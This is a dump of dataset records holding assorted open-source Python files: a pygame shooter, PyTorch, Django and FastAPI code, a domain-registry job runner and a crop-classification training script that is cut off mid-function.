self.player_posY\r\n self.rocket_posX = self.player_posX\r\n self.rocket_mode = \"ready\"\r\n self.red = (255,0,0)\r\n self.rocket_mode_enemy = \"fire\"\r\n self.rocket = pygame.image.load(\"images/rocket.png\")\r\n\r\n #the rocket function to blit rocket on a screen\r\n def rocket_fun(self,x,y):\r\n screen.blit(self.rocket,(x + 5,y - 2))\r\n\r\n\r\n\r\n\r\n#let put a function that will be used to write the scores\r\ndef score_fun(x,y,score):\r\n global text\r\n score_s = text.render(\"Score :\"+str(score),True,(255,255,255))\r\n screen.blit(score_s,(x,y))\r\n\r\n #gameover text\r\ndef game_over_fun(x,y):\r\n global text,score\r\n high_score =score\r\n game_over=text.render(\"GAME OVER /n /n /nYour High score : \"+str(high_score),True,(255,255,255))\r\n screen.blit(game_over,(x,y))\r\n \r\n#isscollision function is used to detect the collision of between rocket and enemy also used on enemy and player collison and other collision\r\ndef iscollision(enemy_posX,rocket_posX,enemy_posY,rocket_posY):\r\n global score\r\n collision=sqrt(pow((enemy_posX - rocket_posX),2) + pow((enemy_posY - rocket_posY),2))\r\n if collision <= 50:\r\n enemy.enemy_health -= 1\r\n score += 1\r\n \r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\ndef callfunction():\r\n #function calls in while loop\r\n score_fun(text_posX,text_posY,score)\r\n player.player_fun()\r\n enemy.enemy_fun(enemy.enemy_posX,enemy.enemy_posY)\r\n score_fun(text_posX,text_posY,score) \r\n##we make the classes to a variable so that we can be able to use it as we define in the class method\r\nrocket = rocket() \r\nplayer = player()\r\nenemy = enemy()\r\n\r\n\r\n\r\n#the main game function\r\n\r\ndef main_fun():\r\n global score\r\n run=True\r\n\r\n while run:\r\n screen.blit(background,(0,0))\r\n \r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n sys.exit()\r\n \r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n player.playerXchange = -player.player_speed\r\n \r\n \r\n if event.key == pygame.K_RIGHT:\r\n player.playerXchange = player.player_speed\r\n \r\n \r\n if event.key == pygame.K_DOWN:\r\n player.playerYchange = player.player_speed\r\n \r\n \r\n \r\n if event.key == pygame.K_UP:\r\n player.playerYchange = -player.player_speed\r\n if event.key == pygame.K_SPACE:\r\n if rocket.rocket_mode == \"ready\":\r\n rocket.rocket_posY = player.player_posY\r\n rocket.rocket_posX = player.player_posX\r\n rocket.rocket_mode = \"fire\"\r\n rocket.rocket_fun(rocket.rocket_posX,rocket.rocket_posY)\r\n rocket.rocket_capacity -= 1\r\n \r\n \r\n \r\n if event.type == pygame.KEYUP:\r\n if event.type == pygame.K_LEFT or pygame.K_RIGHT or pygame.K_UP or pygame.K_DOWN:\r\n player.playerXchange = 0\r\n player.playerYchange = 0\r\n \r\n if event.type == pygame.K_SPACE:\r\n rocket.rocket_mode = \"ready\"\r\n \r\n \r\n \r\n \r\n player.player_posX += player.playerXchange\r\n player.player_posY += player.playerYchange\r\n \r\n \r\n enemy.enemy_posX += enemy.enemy_speed\r\n\r\n #rocket reset \r\n if rocket.rocket_mode == \"fire\":\r\n rocket.rocket_posY -= rocket.rocket_speed\r\n rocket.rocket_fun(rocket.rocket_posX,rocket.rocket_posY)\r\n if rocket.rocket_posY <= -58:\r\n rocket.rocket_mode = \"ready\"\r\n \r\n \r\n callfunction()\r\n \r\n\r\n #boundary of the enemy \r\n if enemy.enemy_posX >= 500:\r\n enemy.enemy_speed = -1\r\n enemy.enemy_posY += 15\r\n if enemy.enemy_posX <= -15:\r\n enemy.enemy_speed = 1\r\n enemy.enemy_posY += 15\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n #playerboundery\r\n if player.player_posX <= 0:\r\n player.player_posX = -1\r\n \r\n if player.player_posX >= 495:\r\n player.player_posX = 495\r\n if player.player_posY <= 0:\r\n player.player_posY = 0\r\n \r\n if player.player_posY >= 600:\r\n player.player_posY = 600\r\n \r\n \r\n \r\n #collission detection\r\n collision_rocket_enemy = iscollision(enemy.enemy_posX,rocket.rocket_posY,enemy.enemy_posY,rocket.rocket_posY)\r\n \r\n if collision_rocket_enemy:\r\n rocket.rocket_mode = \"ready\"\r\n rocket.rocket_posY = player.player_posY\r\n if enemy.enemy_health < 1:\r\n enemy.enemy_posX = 250\r\n enemy.enemy_posY = 0\r\n enemy.enemy_health = 9\r\n \r\n \r\n\r\n if enemy.enemy_health < 1:\r\n enemy.enemy_posX = 250\r\n enemy.enemy_posY = 0\r\n enemy.enemy_health = 9\r\n \r\n \r\n #the function to detect if enemy has collide with the player \r\n collision_player_enemy = iscollision(enemy.enemy_posX,player.player_posX,enemy.enemy_posY,player.player_posY)\r\n if collision_player_enemy:\r\n pygame.quit()\r\n quit()\r\n sys.exit()\r\n pygame.display.flip()\r\nthe_win_start()\r\nmain_fun()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"jasjastone/space-war","sub_path":"space fight.py","file_name":"space fight.py","file_ext":"py","file_size_in_byte":8858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"24275093402","text":"from typing import Optional\n\nimport torch\n\nfrom torch_extras.tied_linear import get_linear\nfrom .simple import SimpleLayerUnidirectional\n\nclass OutputUnidirectional(SimpleLayerUnidirectional):\n\n def __init__(self,\n input_size: int,\n vocabulary_size: int,\n shared_embeddings: Optional[torch.Tensor]=None,\n bias: bool=True\n ):\n super().__init__(get_linear(\n input_size,\n vocabulary_size,\n shared_embeddings,\n bias\n ))\n","repo_name":"bdusell/stack-attention","sub_path":"src/torch_unidirectional/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"33"} +{"seq_id":"42157643123","text":"#!/usr/bin/env python\n\nimport unittest\nfrom dominion import Game, Card, Piles\nimport dominion.CardPile as CardPile\n\n\n###############################################################################\nclass Card_Castles(Card.Card):\n def __init__(self):\n Card.Card.__init__(self)\n self.name = \"Castles\"\n self.base = Card.CardExpansion.EMPIRES\n\n @classmethod\n def cardpile_setup(cls, game):\n card_pile = CastleCardPile(game)\n return card_pile\n\n\n###############################################################################\nclass CastleCardPile(CardPile.CardPile):\n def __init__(self, game):\n self.mapping = game.get_card_classes(\"Castle\", game.paths[\"cards\"], \"Card_\")\n for name, class_ in self.mapping.items():\n game.card_instances[name] = class_()\n super().__init__()\n\n def init_cards(self, num_cards=0, card_class=None):\n self.cards = sorted(\n [_() for _ in self.mapping.values()], key=lambda x: x.cost, reverse=True\n )\n\n\n###############################################################################\nclass CastleCard(Card.Card):\n pass\n\n\n###############################################################################\nclass TestCastles(unittest.TestCase):\n def setUp(self):\n self.g = Game.TestGame(numplayers=1, initcards=[\"Castles\"])\n self.g.start_game()\n self.plr = self.g.player_list(0)\n self.card = self.g.get_card_from_pile(\"Castles\")\n self.plr.piles[Piles.HAND].set(\"Silver\", \"Gold\")\n self.plr.add_card(self.card, Piles.HAND)\n\n def test_castles(self):\n self.g.print_state()\n\n\n###############################################################################\nif __name__ == \"__main__\": # pragma: no cover\n unittest.main()\n\n# EOF\n","repo_name":"dwagon/pydominion","sub_path":"dominion/cards/Card_Castles.py","file_name":"Card_Castles.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"38561801590","text":"import mongoengine\n\nfrom pulp.plugins.util import misc\n\n\ndef find_units(units, pagination_size=50):\n \"\"\"\n Query for units matching the unit key fields of an iterable of ContentUnit objects.\n\n This requires that all the ContentUnit objects are of the same content type.\n\n :param units: Iterable of content units with the unit key fields specified.\n :type units: iterable of pulp.server.db.model.ContentUnit\n :param pagination_size: How large a page size to use when querying units.\n :type pagination_size: int (default 50)\n\n :returns: unit models that pulp already knows about.\n :rtype: Generator of pulp.server.db.model.ContentUnit\n \"\"\"\n # get the class from the first unit\n model_class = None\n\n for units_group in misc.paginate(units, pagination_size):\n q_object = mongoengine.Q()\n # Build a query for the units in this group\n for unit in units_group:\n if model_class is None:\n model_class = unit.__class__\n\n # Build the query for all the units, the | operator here\n # creates the equivalent of a mongo $or of all the unit keys\n unit_q_obj = mongoengine.Q(**unit.unit_key)\n q_object = q_object | unit_q_obj\n\n # Get this group of units\n query = model_class.objects(q_object)\n\n for found_unit in query:\n yield found_unit\n","repo_name":"zjhuntin/pulp","sub_path":"server/pulp/server/controllers/units.py","file_name":"units.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"42586762602","text":"d = {\n0: 'Zero',\n1: 'One',\n2: 'Two',\n3: 'Three',\n4: 'Four', \n5: 'Five', \n6: 'Six', \n7: 'Seven', \n8: 'Eight', \n9: 'Nine'}\ninp = int(input())\ns = ''\n\nrem = 0\nwhile(inp!=0):\n rem = inp%10\n s = (d[rem]+' ') + s\n inp = inp//10\n\nprint(s)","repo_name":"YadavAnurag/cp","sub_path":"extra/number-to-name.py","file_name":"number-to-name.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"37956818072","text":"from fastapi import APIRouter, Depends, status, Response\r\nfrom sqlalchemy.orm import Session\r\nfrom typing import List\r\nfrom legacyDB import db\r\nfrom . import schema, services\r\n\r\nrouter = APIRouter(tags=[\"Aspirations\"], prefix=\"/aspiration\")\r\n\r\n\r\n@router.post(\"/\", status_code=status.HTTP_201_CREATED)\r\nasync def create_new_aspiration(\r\n request: schema.Aspiration, database: Session = Depends(db.get_db)\r\n):\r\n new_aspiration = await services.new_aspiration_register(request, database)\r\n return new_aspiration\r\n\r\n\r\n@router.get(\"/\", response_model=List[schema.DisplayAspiration])\r\nasync def get_all_aspirations(\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.all_aspirations(database)\r\n\r\n\r\n@router.get(\"/child\", response_model=List[schema.DisplayAspiration])\r\nasync def get_all_child_aspirations(\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.all_child_aspirations(database)\r\n\r\n\r\n@router.get(\"/teen\", response_model=List[schema.DisplayAspiration])\r\nasync def get_all_teen_aspirations(\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.all_teen_aspirations(database)\r\n\r\n\r\n@router.get(\"/adult\", response_model=List[schema.DisplayAspiration])\r\nasync def get_all_adult_aspirations(\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.all_adult_aspirations(database)\r\n\r\n\r\n@router.get(\"/{aspiration_id}\", response_model=schema.DisplayAspiration)\r\nasync def get_aspiration_by_id(\r\n aspiration_id: int,\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.get_aspiration_by_id(aspiration_id, database)\r\n\r\n\r\n@router.delete(\r\n \"/{aspiration_id}\", status_code=status.HTTP_204_NO_CONTENT, response_class=Response\r\n)\r\nasync def delete_aspiration_by_id(\r\n aspiration_id: int,\r\n database: Session = Depends(db.get_db),\r\n):\r\n return await services.delete_aspiration_by_id(aspiration_id, database)\r\n","repo_name":"kayrahbear/simslegacychallengeapp","sub_path":"legacyDB/aspirations/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23368216220","text":"import json\n\nfrom django.http import HttpResponse\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\n\nfrom home.models import ShoppingCart, Course, ScheduleItemGroup\n\n@login_required\ndef shopping_cart(request):\n cart, created = ShoppingCart.objects.get_or_create(user=request.user)\n\n courses = cart.courses.all().order_by('course_id')\n\n groups = ScheduleItemGroup.objects.select_related(\n 'lecture','lab','tutorial'\n ).filter(course__in=courses, ).order_by('course')\n\n group_iter = iter(groups) \n\n course_list = []\n try:\n g = next(group_iter)\n except StopIteration:\n pass\n\n for course in courses:\n d = {\"course\":course}\n l = []\n try:\n while g.course == course:\n l.append(g)\n g = next(group_iter)\n except StopIteration:\n pass\n d[\"sections\"] = l\n course_list.append(d)\n\n context = {\"courses\":course_list}\n\n return render(request, \"shopping-cart/view.html\", context)\n\n@login_required\ndef remove(request):\n if request.POST:\n cart, created = ShoppingCart.objects.get_or_create(user=request.user)\n\n if not created:\n course = Course.objects.get(course_id=request.POST.get(\"course\"))\n\n cart.courses.remove(course)\n\n return get_cart_dict(cart)\n\n\ndef get_cart_dict(cart):\n courses = cart.courses.values('course_id', 'course_code', 'course_name')\n\n return HttpResponse(json.dumps(list(courses)), content_type=\"applicationn/json\")\n\n\n@login_required\ndef add(request):\n if request.POST:\n cart, created = ShoppingCart.objects.get_or_create(user=request.user)\n\n course = Course.objects.get(course_id=request.POST.get(\"course\"))\n\n cart.courses.add(course)\n cart.save()\n\n return get_cart_dict(cart)\n\n\n@login_required\ndef get_cart(request):\n if request.user.is_authenticated():\n cart, created = ShoppingCart.objects.get_or_create(user=request.user)\n\n return get_cart_dict(cart)\n \n","repo_name":"grodtron/SOEN341","sub_path":"home/shopping_cart.py","file_name":"shopping_cart.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"25513316456","text":"import sys\nimport argparse\n\nfrom librar import static, misc, registry, pdns, mysql\nfrom librar.mysql import sql_server as sql\nfrom librar.log import log, debug, init as log_init\nfrom mailer import spool_email\nfrom backend import backend_creator\n\nCOPY_DEL_DOM_COLS = [\n \"domain_id\", \"name\", \"user_id\", \"status_id\", \"auto_renew\", \"ns\", \"ds\", \"client_locks\", \"created_dt\", \"amended_dt\",\n \"expiry_dt\"\n]\n\n\ndef event_log(notes, action):\n mysql.event_log({\n \"event_type\": \"Action:\" + action[\"action\"],\n \"domain_id\": action[\"domain_id\"],\n \"user_id\": None,\n \"who_did_it\": \"action\",\n \"from_where\": \"localhost\",\n \"notes\": notes\n })\n\n\ndef flag_expired_domain(__, dom_db):\n pdns.delete_from_catalog(dom_db[\"name\"])\n sql.sql_update_one(\"domains\", {\"status_id\": static.STATUS_EXPIRED}, {\"domain_id\": dom_db[\"domain_id\"]})\n return backend_creator.make_job(\"dom/expired\", dom_db)\n\n\ndef order_cancel(act_db, dom_db):\n ok, order_db = sql.sql_select_one(\"orders\", {\"domain_id\": dom_db[\"domain_id\"], \"user_id\": dom_db[\"user_id\"]})\n if not ok or len(order_db) <= 0:\n return True\n sql.sql_delete(\"orders\", {\"domain_id\": dom_db[\"domain_id\"], \"user_id\": dom_db[\"user_id\"]})\n if order_db[\"order_type\"] == \"dom/create\":\n return delete_domain(act_db, dom_db)\n return True\n\n\ndef delete_domain(__, dom_db):\n sql.sql_delete(\"orders\", {\"domain_id\": dom_db[\"domain_id\"]})\n sql.sql_delete(\"actions\", {\"domain_id\": dom_db[\"domain_id\"]})\n sql.sql_delete_one(\"domains\", {\"domain_id\": dom_db[\"domain_id\"]})\n pdns.delete_zone(dom_db[\"name\"])\n\n if dom_db[\"status_id\"] == static.STATUS_WAITING_PAYMENT:\n del_dom_db = {col: dom_db[col] for col in COPY_DEL_DOM_COLS}\n del_dom_db[\"deleted_dt\"] = None\n sql.sql_insert(\"deleted_domains\", del_dom_db)\n\n return backend_creator.make_job(\"dom/delete\", dom_db)\n\n\ndef send_order_reminder(act_db, dom_db):\n spool_email.spool(\"payment_reminder\", [[\"users\", {\n \"user_id\": dom_db[\"user_id\"]\n }], [\"orders\", {\n \"domain_id\": dom_db[\"domain_id\"]\n }], [\"domains\", {\n \"domain_id\": dom_db[\"domain_id\"]\n }]])\n return True\n\n\ndef auto_renew_domain(act_db, dom_db):\n # CODE REQUIRED\n return True\n\n\ndef send_expiry_reminder(__, dom_db):\n spool_email.spool(\"reminder\", [[\"users\", {\n \"user_id\": dom_db[\"user_id\"]\n }], [\"domains\", {\n \"domain_id\": dom_db[\"domain_id\"]\n }]])\n return True\n\n\ndef delete_action(act_db):\n return sql.sql_delete_one(\"actions\", {\"action_id\": act_db[\"action_id\"]})\n\n\naction_exec = {\n \"dom/delete\": delete_domain,\n \"dom/expired\": flag_expired_domain,\n \"dom/auto-renew\": auto_renew_domain,\n \"dom/reminder\": send_expiry_reminder,\n \"order/reminder\": send_order_reminder,\n \"order/cancel\": order_cancel\n}\n\n\ndef runner():\n ok, act_data = sql.sql_select(\"actions\", \"execute_dt < now()\", limit=1, order_by=\"execute_dt\")\n if not ok or not act_data or len(act_data) < 1:\n return False\n\n act_db = act_data[0]\n if act_db[\"action\"] not in action_exec:\n log(f\"ERROR: Domain action '{act_db['action']}' for DOM-{act_db['domain_id']} - action not found\")\n return delete_action(act_db)\n\n ok, dom_db = sql.sql_select_one(\"domains\", {\"domain_id\": act_db[\"domain_id\"]})\n if not ok or len(dom_db) < 1:\n log(f\"ERROR: Domain action '{act_db['action']}' for DOM-{act_db['domain_id']} - domain not found\")\n return delete_action(act_db)\n\n if not action_exec[act_db[\"action\"]](act_db, dom_db):\n log(f\"ERROR: Domain action '{act_db['action']}' for DOM-{dom_db['domain_id']} - action failed\")\n\n event_log(f\"Domain action '{act_db['action']}' for DOM-{dom_db['domain_id']} - action done\", act_db)\n return delete_action(act_db)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='EPP Jobs Runner')\n parser.add_argument(\"-D\", '--debug', action=\"store_true\")\n parser.add_argument(\"-a\", '--action')\n parser.add_argument(\"-d\", '--domain')\n args = parser.parse_args()\n log_init(with_debug=(args.debug or args.action or args.domain))\n\n sql.connect(\"engine\")\n pdns.start_up()\n registry.start_up()\n\n if args.action and args.domain:\n ok, dom_db = sql.sql_select_one(\"domains\", {\"name\": args.domain})\n if not ok or len(dom_db) <= 0:\n debug(f\"ERROR: {args.domain} not found\")\n sys.exit(1)\n\n if args.action not in action_exec:\n debug(f\"ERROR: action '{args.action}' not possible\")\n sys.exit(1)\n\n act_db = {\"domain_id\": dom_db[\"domain_id\"], \"execute_dt\": misc.now(), \"action\": args.action}\n print(\">>>> RUNNING\", args.action, \"on\", dom_db[\"name\"])\n print(\">>>> ACTION\", action_exec[args.action](act_db, dom_db))\n sys.exit(0)\n\n debug(\"RUNNING\")\n while runner():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"james-stevens/pyrar","sub_path":"python/actions/run_actions.py","file_name":"run_actions.py","file_ext":"py","file_size_in_byte":4900,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"33"} +{"seq_id":"30275657576","text":"#!/usr/bin/env python3\n\nimport sys\n\nfilename = sys.argv[1]\nqueryString = sys.argv[2]\n\nsavedText = []\n\nprintSwitch = False\n\nwith open(filename, 'r') as infile:\n for line in infile:\n if line.startswith('>'):\n if queryString in line:\n printSwitch = True\n else:\n printSwitch = False\n if printSwitch:\n savedText.append(line)\n\nprint(''.join(savedText))\n","repo_name":"cory-weller/long-read-yeast-genomes","sub_path":"src/extract_contig.py","file_name":"extract_contig.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"34277503322","text":"from data import BavarianCrops, BreizhCrops, SustainbenchCrops, ModisCDL\nfrom torch.utils.data import DataLoader\nfrom earlyrnn import EarlyRNN\nimport torch\nfrom tqdm import tqdm\nfrom loss import EarlyRewardLoss\nimport numpy as np\nfrom utils import VisdomLogger\nimport sklearn.metrics\nimport pandas as pd\nimport argparse\nimport os\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Run ELECTS Early Classification training on the BavarianCrops dataset.')\n parser.add_argument('--dataset', type=str, default=\"bavariancrops\", choices=[\"bavariancrops\",\"breizhcrops\", \"ghana\", \"southsudan\",\"unitedstates\"], help=\"dataset\")\n parser.add_argument('--alpha', type=float, default=0.5, help=\"trade-off parameter of earliness and accuracy (eq 6): \"\n \"1=full weight on accuracy; 0=full weight on earliness\")\n parser.add_argument('--epsilon', type=float, default=10, help=\"additive smoothing parameter that helps the \"\n \"model recover from too early classificaitons (eq 7)\")\n parser.add_argument('--learning-rate', type=float, default=1e-3, help=\"Optimizer learning rate\")\n parser.add_argument('--weight-decay', type=float, default=0, help=\"weight_decay\")\n parser.add_argument('--patience', type=int, default=30, help=\"Early stopping patience\")\n parser.add_argument('--device', type=str, default=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n choices=[\"cuda\", \"cpu\"], help=\"'cuda' (GPU) or 'cpu' device to run the code. \"\n \"defaults to 'cuda' if GPU is available, otherwise 'cpu'\")\n parser.add_argument('--epochs', type=int, default=100, help=\"number of training epochs\")\n parser.add_argument('--sequencelength', type=int, default=70, help=\"sequencelength of the time series. If samples are shorter, \"\n \"they are zero-padded until this length; \"\n \"if samples are longer, they will be undersampled\")\n parser.add_argument('--batchsize', type=int, default=256, help=\"number of samples per batch\")\n parser.add_argument('--dataroot', type=str, default=os.path.join(os.environ[\"HOME\"],\"elects_data\"), help=\"directory to download the \"\n \"BavarianCrops dataset (400MB).\"\n \"Defaults to home directory.\")\n parser.add_argument('--snapshot', type=str, default=\"snapshots/model.pth\",\n help=\"pytorch state dict snapshot file\")\n parser.add_argument('--resume', action='store_true')\n\n\n args = parser.parse_args()\n\n if args.patience < 0:\n args.patience = None\n\n return args\n\ndef main(args):\n\n if args.dataset == \"bavariancrops\":\n dataroot = os.path.join(args.dataroot,\"bavariancrops\")\n nclasses = 7\n input_dim = 13\n class_weights = None\n train_ds = BavarianCrops(root=dataroot,partition=\"train\", sequencelength=args.sequencelength)\n test_ds = BavarianCrops(root=dataroot,partition=\"valid\", sequencelength=args.sequencelength)\n elif args.dataset == \"unitedstates\":\n args.dataroot = \"/data/modiscdl/\"\n args.sequencelength = 24\n dataroot = args.dataroot\n nclasses = 8\n input_dim = 1\n train_ds = ModisCDL(root=dataroot,partition=\"train\", sequencelength=args.sequencelength)\n test_ds = ModisCDL(root=dataroot,partition=\"valid\", sequencelength=args.sequencelength)\n elif args.dataset == \"breizhcrops\":\n dataroot = os.path.join(args.dataroot,\"breizhcrops\")\n nclasses = 9\n input_dim = 13\n train_ds = BreizhCrops(root=dataroot,partition=\"train\", sequencelength=args.sequencelength)\n test_ds = BreizhCrops(root=dataroot,partition=\"valid\", sequencelength=args.sequencelength)\n elif args.dataset in [\"ghana\"]:\n use_s2_only = False\n average_pixel = False\n max_n_pixels = 50\n dataroot = args.dataroot\n nclasses = 4\n input_dim = 12 if use_s2_only else 19 # 12 sentinel 2 + 3 x sentinel 1 + 4 * planet\n args.epochs = 500\n args.sequencelength = 365\n train_ds = SustainbenchCrops(root=dataroot,partition=\"train\", sequencelength=args.sequencelength,\n country=\"ghana\",\n use_s2_only=use_s2_only, average_pixel=average_pixel,\n max_n_pixels=max_n_pixels)\n val_ds = SustainbenchCrops(root=dataroot,partition=\"val\", sequencelength=args.sequencelength,\n country=\"ghana\", use_s2_only=use_s2_only, average_pixel=average_pixel,\n max_n_pixels=max_n_pixels)\n\n train_ds = torch.utils.data.ConcatDataset([train_ds, val_ds])\n\n test_ds = SustainbenchCrops(root=dataroot,partition=\"test\", sequencelength=args.sequencelength,\n country=\"ghana\", use_s2_only=use_s2_only, average_pixel=average_pixel,\n max_n_pixels=max_n_pixels)\n elif args.dataset in [\"southsudan\"]:\n use_s2_only = False\n dataroot = args.dataroot\n nclasses = 4\n args.sequencelength = 365\n input_dim = 12 if use_s2_only else 19 # 12 sentinel 2 + 3 x sentinel 1 + 4 * planet\n args.epochs = 500\n train_ds = SustainbenchCrops(root=dataroot,partition=\"train\", sequencelength=args.sequencelength, country=\"southsudan\", use_s2_only=use_s2_only)\n val_ds = SustainbenchCrops(root=dataroot,partition=\"val\", sequencelength=args.sequencelength, country=\"southsudan\", use_s2_only=use_s2_only)\n\n train_ds = torch.utils.data.ConcatDataset([train_ds, val_ds])\n test_ds = SustainbenchCrops(root=dataroot, partition=\"val\", sequencelength=args.sequencelength,\n country=\"southsudan\", use_s2_only=use_s2_only)\n\n else:\n raise ValueError(f\"dataset {args.dataset} not recognized\")\n\n traindataloader = DataLoader(\n train_ds,\n batch_size=args.batchsize)\n testdataloader = DataLoader(\n test_ds,\n batch_size=args.batchsize)\n\n model = EarlyRNN(nclasses=nclasses, input_dim=input_dim).to(args.device)\n\n\n #optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate, weight_decay=args.weight_decay)\n\n # exclude decision head linear bias from weight decay\n decay, no_decay = list(), list()\n for name, param in model.named_parameters():\n if name == \"stopping_decision_head.projection.0.bias\":\n no_decay.append(param)\n else:\n decay.append(param)\n\n optimizer = torch.optim.AdamW([{'params': no_decay, 'weight_decay': 0, \"lr\": args.learning_rate}, {'params': decay}],\n lr=args.learning_rate, weight_decay=args.weight_decay)\n\n criterion = EarlyRewardLoss(alpha=args.alpha, epsilon=args.epsilon)\n\n if args.resume and os.path.exists(args.snapshot):\n model.load_state_dict(torch.load(args.snapshot, map_location=args.device))\n optimizer_snapshot = os.path.join(os.path.dirname(args.snapshot),\n os.path.basename(args.snapshot).replace(\".pth\", \"_optimizer.pth\")\n )\n optimizer.load_state_dict(torch.load(optimizer_snapshot, map_location=args.device))\n df = pd.read_csv(args.snapshot + \".csv\")\n train_stats = df.to_dict(\"records\")\n start_epoch = train_stats[-1][\"epoch\"]\n print(f\"resuming from {args.snapshot} epoch {start_epoch}\")\n else:\n train_stats = []\n start_epoch = 1\n visdom_logger = VisdomLogger()\n\n not_improved = 0\n with tqdm(range(start_epoch, args.epochs + 1)) as pbar:\n for epoch in pbar:\n trainloss = train_epoch(model, traindataloader, optimizer, criterion, device=args.device)\n testloss, stats = test_epoch(model, testdataloader, criterion, args.device)\n\n # statistic logging and visualization...\n precision, recall, fscore, support = sklearn.metrics.precision_recall_fscore_support(\n y_pred=stats[\"predictions_at_t_stop\"][:, 0], y_true=stats[\"targets\"][:, 0], average=\"macro\",\n zero_division=0)\n accuracy = sklearn.metrics.accuracy_score(\n y_pred=stats[\"predictions_at_t_stop\"][:, 0], y_true=stats[\"targets\"][:, 0])\n kappa = sklearn.metrics.cohen_kappa_score(\n stats[\"predictions_at_t_stop\"][:, 0], stats[\"targets\"][:, 0])\n\n classification_loss = stats[\"classification_loss\"].mean()\n earliness_reward = stats[\"earliness_reward\"].mean()\n earliness = 1 - (stats[\"t_stop\"].mean() / (args.sequencelength - 1))\n\n stats[\"confusion_matrix\"] = sklearn.metrics.confusion_matrix(y_pred=stats[\"predictions_at_t_stop\"][:, 0],\n y_true=stats[\"targets\"][:, 0])\n\n train_stats.append(\n dict(\n epoch=epoch,\n trainloss=trainloss,\n testloss=testloss,\n accuracy=accuracy,\n precision=precision,\n recall=recall,\n fscore=fscore,\n kappa=kappa,\n earliness=earliness,\n classification_loss=classification_loss,\n earliness_reward=earliness_reward\n )\n )\n\n visdom_logger(stats)\n visdom_logger.plot_boxplot(stats[\"targets\"][:, 0], stats[\"t_stop\"][:, 0], tmin=0, tmax=args.sequencelength)\n df = pd.DataFrame(train_stats).set_index(\"epoch\")\n visdom_logger.plot_epochs(df[[\"precision\", \"recall\", \"fscore\", \"kappa\"]], name=\"accuracy metrics\")\n visdom_logger.plot_epochs(df[[\"trainloss\", \"testloss\"]], name=\"losses\")\n visdom_logger.plot_epochs(df[[\"accuracy\", \"earliness\"]], name=\"accuracy, earliness\")\n visdom_logger.plot_epochs(df[[\"classification_loss\", \"earliness_reward\"]], name=\"loss components\")\n\n savemsg = \"\"\n if len(df) > 2:\n if testloss < df.testloss[:-1].values.min():\n savemsg = f\"saving model to {args.snapshot}\"\n os.makedirs(os.path.dirname(args.snapshot), exist_ok=True)\n torch.save(model.state_dict(), args.snapshot)\n\n optimizer_snapshot = os.path.join(os.path.dirname(args.snapshot),\n os.path.basename(args.snapshot).replace(\".pth\", \"_optimizer.pth\")\n )\n torch.save(optimizer.state_dict(), optimizer_snapshot)\n\n df.to_csv(args.snapshot + \".csv\")\n not_improved = 0 # reset early stopping counter\n else:\n not_improved += 1 # increment early stopping counter\n if args.patience is not None:\n savemsg = f\"early stopping in {args.patience - not_improved} epochs.\"\n else:\n savemsg = \"\"\n\n pbar.set_description(f\"epoch {epoch}: trainloss {trainloss:.2f}, testloss {testloss:.2f}, \"\n f\"accuracy {accuracy:.2f}, earliness {earliness:.2f}. \"\n f\"classification loss {classification_loss:.2f}, earliness reward {earliness_reward:.2f}. {savemsg}\")\n\n if args.patience is not None:\n if not_improved > args.patience:\n print(f\"stopping training. testloss {testloss:.2f} did not improve in {args.patience} epochs.\")\n break\n\ndef train_epoch(model, dataloader, optimizer, criterion, device):\n losses = []\n model.train()\n for batch in dataloader:\n optimizer.zero_grad()\n X, y_true = batch\n X, y_true = X.to(device), y_true.to(device)\n log_class_probabilities, probability_stopping = model(X)\n\n loss = criterion(log_class_probabilities, probability_stopping, y_true)\n\n #assert not loss.isnan().any()\n if not loss.isnan().any():\n loss.backward()\n optimizer.step()\n\n losses.append(loss.cpu().detach().numpy())\n\n return np.stack(losses).mean()\n\ndef test_epoch(model, dataloader, criterion, device):\n model.eval()\n\n stats = []\n losses = []\n for batch in dataloader:\n X, y_true = batch\n X, y_true = X.to(device), y_true.to(device)\n\n log_class_probabilities, probability_stopping, predictions_at_t_stop, t_stop = model.predict(X)\n loss, stat = criterion(log_class_probabilities, probability_stopping, y_true, return_stats=True)\n\n stat[\"loss\"] = loss.cpu().detach().numpy()\n stat[\"probability_stopping\"] = probability_stopping.cpu().detach().numpy()\n stat[\"class_probabilities\"] = 